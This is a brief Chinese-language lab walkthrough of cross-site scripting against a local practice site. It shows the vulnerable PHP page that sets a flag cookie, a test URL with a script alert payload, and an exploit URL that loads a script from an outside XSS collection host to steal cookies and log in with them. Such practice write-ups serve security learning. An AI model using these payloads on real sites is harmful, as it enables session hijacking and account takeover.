1、(1)反射XSS网页源码:
<?php
require_once "../../common/common.php";
if (!isset($_SESSION['user'])) {
header("Location:../login.php");
}
setcookie("flag", "", time() - 1);
if (isset($_GET["id"])) {
if (!empty($_GET["id"])) {
if (strstr($_GET['id'], 'alert')){
$sql = "SELECT * FROM env_list WHERE id = 9";
$res = $dbConnect->query($sql);
$row = mysqli_fetch_assoc($res);
setcookie("flag", $row['envFlag']);
}
}
}
require_once TPMELATE."/xss_1.html";
?>
(2)XSS测试:
http://192.168.153.128/control/xss/xss_1.php?id=1%3Cscript%3Ealert%281%29%3C/script%3E
(3)xss后台配置:(本人用的后台:https://xsshs.cn)
(4)利用XSS:
192.168.153.128/control/xss/xss_1.php?id=1<sCRiPt sRC=https://xsshs.cn/wPGg></sCrIpT>
(5)、在后台可以获取cookie,直接利用cookie登陆:
(2)存储XSS:
提交后,会自动存在数据库,访问网页直接执行